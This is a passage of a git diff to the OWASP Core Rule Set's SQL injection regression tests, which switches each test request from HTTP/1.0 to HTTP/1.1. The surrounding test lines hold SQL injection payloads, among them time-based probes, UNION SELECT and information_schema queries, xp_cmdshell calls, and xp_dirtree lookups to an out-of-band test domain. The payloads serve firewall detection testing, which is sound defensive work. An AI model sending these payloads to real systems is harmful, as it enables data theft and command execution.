+    desc: "False positive with left, ("
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Host: localhost
+            User-Agent: "OWASP CRS test agent"
+            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+          method: POST
+          port: 80
+          uri: "/post"
+          data: "payload=The script is written from right to left, (Lal 1966) and sometimes follows a boustrophedonic style."
+          version: HTTP/1.1
+        output:
+          log:
+            no_expect_ids: [942151]
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942152.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942152.yaml
index 80057834e..097b310ce 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942152.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942152.yaml
@@ -16,7 +16,7 @@ tests:
           method: GET
           port: 80
           uri: "/get"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942152]
@@ -32,7 +32,7 @@ tests:
           method: GET
           port: 80
           uri: "/get"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942152]
@@ -48,7 +48,7 @@ tests:
           method: GET
           port: 80
           uri: "/get"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942152]
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942160.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942160.yaml
index a409e5662..9fc85c1c8 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942160.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942160.yaml
@@ -15,7 +15,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?sql_table=sleep%28534543%29"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942160]
@@ -32,7 +32,7 @@ tests:
           port: 80
           uri: "/post"
           data: "sleEP(3)"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942160]
@@ -49,7 +49,7 @@ tests:
           port: 80
           uri: "/post"
           data: "sleep(5000)"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942160]
@@ -66,7 +66,7 @@ tests:
           port: 80
           uri: "/post"
           data: "BENChmARk(2999/**/999,Md5(NoW()"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942160]
@@ -83,7 +83,7 @@ tests:
           port: 80
           uri: "/post"
           data: "BEncHMARk(2999999,Md5(NoW('')"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942160]
@@ -100,7 +100,7 @@ tests:
           port: 80
           uri: "/post"
           data: "BENCHMARK(5000000,MD5(0x48416166)"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942160]
@@ -117,7 +117,7 @@ tests:
           port: 80
           uri: "/post"
           data: "benchmark(3000000,M%445(4)"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942160]
@@ -134,7 +134,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=BENCHMARK(1000000, md5\" AND 1883=1883-- GSCC('')"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942160]
@@ -151,7 +151,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=BeNChMaRK(1000000, md5 AND 9796=4706('')"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942160]
@@ -167,7 +167,7 @@ tests:
           method: GET
           port: 80
           uri: "/get/if(now()=sysdate(),sleep(12),0)"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942160]
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942170.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942170.yaml
index 44ce44bdd..07c9bd4e4 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942170.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942170.yaml
@@ -15,7 +15,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?var=SELECT%20BENCHMARK%281000000%2C1%2B1%29%3B"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942170]
@@ -31,7 +31,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?var=%3B%20sleep%280%29"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942170]
@@ -47,7 +47,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?var=I%20sleep%20well%21"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [942170]
@@ -63,7 +63,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?test=select+if(x"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942170]
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml
index 8b96a08c5..2b6f491b7 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml
@@ -16,7 +16,7 @@ tests:
           port: 80
           # something simple like 3' ' 1
           uri: "/get?var=3%27%20%27%201"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942180]
@@ -32,7 +32,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: "javascript:\"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \""
         output:
           log:
@@ -49,7 +49,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?var=%27%3b"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942180]
@@ -65,7 +65,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?var=%27glob%201%3b"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942180]
@@ -81,7 +81,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?var=%27%3bprint%27"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942180]
@@ -97,7 +97,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?var=%27%3b%23"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942180]
@@ -113,7 +113,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?var=%27or%28id%20glob%201%29--"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942180]
@@ -129,7 +129,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?var=%27or%28glob%201%29--"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942180]
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942190.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942190.yaml
index fed1116d6..a93ee79cd 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942190.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942190.yaml
@@ -18,7 +18,7 @@ tests:
           # uri: "/?var=\" sleep(120\""  # triggers 942330
           # NB: match with %20 but no bare byte match?
           uri: "/get?var=%20exec%20xp_cmdshell"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942190]
@@ -35,7 +35,7 @@ tests:
           port: 80
           uri: "/post"
           data: "%22%21%22%0A"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942190]
@@ -52,7 +52,7 @@ tests:
           port: 80
           uri: "/post"
           data: "%22+union+select%0A"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942190]
@@ -69,7 +69,7 @@ tests:
           port: 80
           uri: "/post"
           data: "current_user%28%0A"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942190]
@@ -86,7 +86,7 @@ tests:
           port: 80
           uri: "/post"
           data: "FROM+INFORMATION_SCHEMA.%0A"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942190]
@@ -103,7 +103,7 @@ tests:
           port: 80
           uri: "/post"
           data: "%27%3BSELECT+P%0A"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942190]
@@ -120,7 +120,7 @@ tests:
           port: 80
           uri: "/post"
           data: "UnIon+seleCt%0A"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942190]
@@ -137,7 +137,7 @@ tests:
           port: 80
           uri: "/post"
           data: "%27union%20select%2F%0A"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942190]
@@ -154,7 +154,7 @@ tests:
           port: 80
           uri: "/post"
           data: "from+information_schema.%0A"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942190]
@@ -171,7 +171,7 @@ tests:
           port: 80
           uri: "/post"
           data: "select%5D%3Dpolygon%28%28%2F%2A%2100000select%2A%2F%2A%2F%2A%2100000from%2A%2F%28%2F%2A%2100000select%2A%2F%2A%2F%2A%2100000from%2A%2F%28%2F%2A%2100000select%2A%2Fconcat_ws%280x7e3a%2C0x6d616b6d616e%2Cversion%28%29%2Cuser%28%0A"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942190]
@@ -188,7 +188,7 @@ tests:
           port: 80
           uri: "/post"
           data: "user%28%0A"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942190]
@@ -205,7 +205,7 @@ tests:
           port: 80
           uri: "/post"
           data: "database%28%0A"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942190]
@@ -222,7 +222,7 @@ tests:
           port: 80
           uri: "/post"
           data: "select%28user%28%0A"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942190]
@@ -239,7 +239,7 @@ tests:
           port: 80
           uri: "/post"
           data: "SeLect%2A%2F+1%2C2%2C3%2Cuser%28%0A"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942190]
@@ -256,7 +256,7 @@ tests:
           port: 80
           uri: "/post"
           data: "select%5D%3D%28ExtractValue%281%2C%28select%2520concat_ws%280x3a%2Cuser%28%0A"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942190]
@@ -273,7 +273,7 @@ tests:
           port: 80
           uri: "/post"
           data: "from+%60information_schema%60%0A"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942190]
@@ -290,7 +290,7 @@ tests:
           port: 80
           uri: "/post"
           data: "%27select+H%0A"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942190]
@@ -307,7 +307,7 @@ tests:
           port: 80
           uri: "/post"
           data: "%27%3Bselect+p%0A"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942190]
@@ -324,7 +324,7 @@ tests:
           port: 80
           uri: "/post"
           data: "FROM+INFORMATION_SCHEMA.%0A"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942190]
@@ -341,7 +341,7 @@ tests:
           port: 80
           uri: "/post"
           data: "+EXEC+xp_cmdshell%0A"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942190]
@@ -358,7 +358,7 @@ tests:
           port: 80
           uri: "/post"
           data: "%22%21+Y%0A"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942190]
@@ -375,7 +375,7 @@ tests:
           port: 80
           uri: "/post"
           data: "exec+master.%0A"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942190]
@@ -392,7 +392,7 @@ tests:
           port: 80
           uri: "/post"
           data: "into+outfile+%27%0A"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942190]
@@ -409,7 +409,7 @@ tests:
           port: 80
           uri: "/post"
           data: "Union+sElect%0A"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942190]
@@ -426,7 +426,7 @@ tests:
           port: 80
           uri: "/post"
           data: "selectect%2520user%28%0A"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942190]
@@ -443,7 +443,7 @@ tests:
           port: 80
           uri: "/post"
           data: "+exec+master..xp_cmdshell%0A"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942190]
@@ -460,7 +460,7 @@ tests:
           port: 80
           uri: "/post"
           data: "selectect%252520user%28%0A"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942190]
@@ -477,7 +477,7 @@ tests:
           port: 80
           uri: "/post"
           data: "execution%3De1s1%26OlyH%3D9767+AND+1%3D1+UNION+ALL+SELECT+1%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name+FROM+information_schema.tables+WHERE+2%3E1--%2F%2A%2A%2F%3B+EXEC+xp_cmdshell%0A"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942190]
@@ -494,7 +494,7 @@ tests:
           port: 80
           uri: "/post"
           data: "%27%21%60%0A"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942190]
@@ -511,7 +511,7 @@ tests:
           port: 80
           uri: "/post"
           data: "%22%20UNION%20ALL%20SELECT%0A"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942190]
@@ -528,7 +528,7 @@ tests:
           port: 80
           uri: "/post"
           data: "EXec+xp_cmdshell%0A"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942190]
@@ -545,7 +545,7 @@ tests:
           port: 80
           uri: "/post"
           data: "FrOM+information_schema.%0A"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942190]
@@ -562,7 +562,7 @@ tests:
           port: 80
           uri: "/post"
           data: "select+1+FROM%28select+count%28%2A%29%2Cconcat%28%28select+%28select+concat%28user%28%0A"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942190]
@@ -579,7 +579,7 @@ tests:
           port: 80
           uri: "/post"
           data: "%60%211%0A"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942190]
@@ -596,7 +596,7 @@ tests:
           port: 80
           uri: "/post"
           data: "uNioN++sElecT%0A"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942190]
@@ -613,7 +613,7 @@ tests:
           port: 80
           uri: "/post"
           data: "%22%3BSELECT+P%0A"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942190]
@@ -630,7 +630,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=UnIoN+SeLeCt%0A"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942190]
@@ -647,7 +647,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=1);declare @q varchar(99);set @q='\\\\j0kwbatxjfgjp0qu3ibonwovamgmkq8h05unittests.corerule' 'set.org\\kph'; exec master.dbo.xp_dirtree @q;--"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942190]
@@ -664,7 +664,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=content.ini);declare @q varchar(99);set @q='\\\\i1kvc9uwkehiqzrt4hcnovpublhunittests.corerule' 'set.org\\lri'; exec master.dbo.xp_dirtree @q;--"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942190]
@@ -681,7 +681,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=EmptyValue', '4', '2', '7');declare @q varchar(99);set @q='\\\\h5nug8yvodlhuyvs8ggmsuttfklkcjunittests.corerule'+'set.org\\vcr'; exec master.dbo.xp_dirtree @q;--"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942190]
@@ -698,7 +698,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=test));declare @q varchar(99);set @q='\\\\zwzc7qpdfvczlgmazy74jckb62cunittests.corrule'+'set.org\\gej'; exec master.dbo.xp_dirtree @q;--"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942190]
@@ -715,7 +715,7 @@ tests:
           port: 80
           uri: "/get"
           data: "id=@.:=right(right((select+user_login+from+wordpress.wp_users+limit+1,1),1111),1111)+union%23%0adistinctrow%0bselect@."
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942190]
@@ -732,7 +732,7 @@ tests:
           port: 80
           uri: "/get"
           data: "arg=Die%20%22Union%20von%20Europa%22"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [942190]
@@ -749,7 +749,7 @@ tests:
           port: 80
           uri: "/get"
           data: "arg=SELECT%20IIF(1%20%3E%201%2C%20'TRUE'%2C%20'FALSE'%20)"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942190]
@@ -766,7 +766,7 @@ tests:
           port: 80
           uri: "/get"
           data: "arg=it%20is%20my%20beliif%20%28stemming%20from%20personal%20experience%29%2C%20that"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [942190]
@@ -783,7 +783,7 @@ tests:
           port: 80
           uri: "/get"
           data: "arg=appUser(sitename,user)"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [942190]
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942200.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942200.yaml
index 0415f2901..3aff153d0 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942200.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942200.yaml
@@ -16,7 +16,7 @@ tests:
           port: 80
           uri: "/post"
           data: ",varname%22=somedata"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942200]
@@ -32,7 +32,7 @@ tests:
           method: GET
           port: 80
           uri: "/get"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942200]
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942210.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942210.yaml
index 42a96fdb4..60e1fa0f3 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942210.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942210.yaml
@@ -17,7 +17,7 @@ tests:
           uri: "/post"
           # @.= ( select
           data: "var%3d%20@.%3d%20%28%20SELECT"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942210]
@@ -34,7 +34,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay%3DAND+2771%3D1709%29"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942210]
@@ -51,7 +51,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=%3B+insert+into"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942210]
@@ -68,7 +68,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay%3DAND+7639%3D%28"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942210]
@@ -85,7 +85,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay%3Dor+120%3D121%3D"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942210]
@@ -102,7 +102,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay%3DAND+deleted+%3D+0%29"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942210]
@@ -119,7 +119,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay%3D%2FCm7+OR+"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942210]
@@ -136,7 +136,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay%3DOR+%287319%3D8742%29"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942210]
@@ -153,7 +153,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay%3D%7C%7C%28null%21%3D"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942210]
@@ -170,7 +170,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay%3Dand+1%21%3D%22"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942210]
@@ -187,7 +187,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay%3Ddiv+role%3D%22"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942210]
@@ -204,7 +204,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay%3Ddiv+id%3D%22"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942210]
@@ -221,7 +221,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay%3Ddiv+style%3D%22"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942210]
@@ -238,7 +238,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay%3Dor+1%3D%27"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942210]
@@ -255,7 +255,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay%3DAND+7829%3D%28"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942210]
@@ -272,7 +272,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay%3DAND+4372%3D%28"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942210]
@@ -289,7 +289,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay%3D%3B+UpdateUserTypeTracking"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942210]
@@ -306,7 +306,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay%3DoR+pmw%3D%3D"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942210]
@@ -323,7 +323,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay%3D%7C%7C+langCode+%3D%3D+%27"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942210]
@@ -340,7 +340,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay%3D%7C%7C+c+%3D%3D+%27"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942210]
@@ -357,7 +357,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay%3D%7C%7C+arg+%3D%3D+%27"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942210]
@@ -374,7 +374,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay%3D%2FHmong_language+AND+"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942210]
@@ -391,7 +391,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay%3D%7C%7C+langCode+%3D%3D"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942210]
@@ -408,7 +408,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay%3D%7C%7C+checker+%3D%3D"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942210]
@@ -425,7 +425,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay%3D%26%26+setPath+%21%3D"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942210]
@@ -442,7 +442,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay%3D%3Bset+%40"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [942210]
@@ -459,7 +459,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay%3D%3Bupdate+users"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942210]
@@ -476,7 +476,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay%3Dand+1%3D%28"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942210]
@@ -493,7 +493,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay%3D%2FSPZwOaVcDWkrRly2aV01662fN+Or+"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942210]
@@ -510,7 +510,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay%3DOR+CType%3D%27"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942210]
@@ -527,7 +527,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay%3D1+OR+2%2B"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [942210]
@@ -544,7 +544,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay%3D%3ESET+%40OLD_SQL_NOTES"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942210]
@@ -561,7 +561,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay%3D%3BSET+%40OLD_SQL_MODE"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942210]
@@ -578,7 +578,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay%3D%3BSET+%40OLD_FOREIGN_KEY_CHECKS"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942210]
@@ -595,7 +595,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay%3D%3BSET+%40OLD_UNIQUE_CHECKS"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942210]
@@ -612,7 +612,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay%3D%3Bdrop"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942210]
@@ -629,7 +629,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay%3D+SET+%40OLD_SQL_NOTES"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942210]
@@ -646,7 +646,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay%3D%40example.com%26name%3D%28select"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942210]
@@ -663,7 +663,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay%3D%40extension%5D%3DMmcDirectmailSubscription%26tx_mmcdirectmailsubscription_subscr%5B__referrer%5D%5B%40vendor%5D%3D%28SELECT"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942210]
@@ -680,7 +680,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay%3D%40extension%5D%3DMmcDirectmailSubscription%26tx_mmcdirectmailsubscription_subscr%5B__referrer%5D%5B%40vendor%5D%3DMMC%26tx_mmcdirectmailsubscription_subscr%5B__referrer%5D%5B%40controller%5D%3DSubscribe%26tx_mmcdirectmailsubscription_subscr%5B__referrer%5D%5B%40action%5D%3Dregister%26tx_mmcdirectmailsubscription_subscr%5B__referrer%5D%5Barguments%5D%3DYTowOnt98f5f75937bad1b56b6c736ef42e625647dab347d%26tx_mmcdirectmailsubscription_subscr%5B__referrer%5D%5B%40request%5D%3Da%3A4%3A%7Bs%3A10%3A%26tx_mmcdirectmailsubscription_subscr%5B__trustedProperties%5D%3Da%3A4%3A%7Bs%3A7%3A%26tx_mmcdirectmailsubscription_subscr%5Baddress%5D%5BfirstName%5D%3D%28SELECT"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942210]
@@ -697,7 +697,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay%3Dand+object_type+%3D+%27"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942210]
@@ -714,7 +714,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay%3D%2FBusiness+and"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [942210]
@@ -731,7 +731,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay%3DAND+value+%3D+%27"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942210]
@@ -748,7 +748,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay%3D4AND4%2B"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [942210]
@@ -765,7 +765,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay%3D%2F3+or+"
